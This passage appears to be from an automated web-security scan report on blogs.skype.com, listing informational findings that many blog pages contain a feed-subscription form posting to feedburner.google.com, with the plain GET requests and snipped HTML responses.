<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.89. http://blogs.skype.com/en/brew/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/brew/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/brew/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54209
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.90. http://blogs.skype.com/en/campaigns_and_promotions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/campaigns_and_promotions/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/campaigns_and_promotions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:01 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 175514
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.91. http://blogs.skype.com/en/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/careers/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/careers/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 65154
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.92. http://blogs.skype.com/en/comments.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/comments.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/comments.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:54 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57205
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sky
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.93. http://blogs.skype.com/en/corporate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/corporate/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/corporate/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 169222
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.94. http://blogs.skype.com/en/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/education/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/education/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 70824
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.95. http://blogs.skype.com/en/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/enterprise/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/enterprise/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.96. http://blogs.skype.com/en/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/entertainment/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/entertainment/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:06 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59910
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.97. http://blogs.skype.com/en/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/events/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/events/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 115014
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.98. http://blogs.skype.com/en/facebook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/facebook/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/facebook/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:08 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 96175
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.99. http://blogs.skype.com/en/html-guide.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/html-guide.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/html-guide.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:55 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sky
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.100. http://blogs.skype.com/en/insight/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/insight/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/insight/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 225293
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.101. http://blogs.skype.com/en/iphone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/iphone/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/iphone/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 84563
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.102. http://blogs.skype.com/en/life_at_skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/life_at_skype/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/life_at_skype/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 114247
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.103. http://blogs.skype.com/en/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mac/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/mac/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 102498
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.104. http://blogs.skype.com/en/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mobile/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/mobile/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 264936
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.105. http://blogs.skype.com/en/mwc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mwc/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/mwc/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60235
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.106. http://blogs.skype.com/en/open_internet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/open_internet/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/open_internet/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105907
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.107. http://blogs.skype.com/en/palm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/palm/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/palm/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59335
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.108. http://blogs.skype.com/en/skype_on_your_tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/skype_on_your_tv/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/skype_on_your_tv/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:16 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105119
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.109. http://blogs.skype.com/en/social_good/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/social_good/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/social_good/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.110. http://blogs.skype.com/en/sony_ericsson/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/sony_ericsson/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/sony_ericsson/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:18 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 66399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.111. http://blogs.skype.com/en/subscriptions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/subscriptions/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/subscriptions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107961
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.112. http://blogs.skype.com/en/symbian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/symbian/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/symbian/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 66381
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.113. http://blogs.skype.com/en/verizon_wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/verizon_wireless/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/verizon_wireless/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 97811
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.114. http://blogs.skype.com/en/wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/wifi/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/wifi/ HTTP/1.1
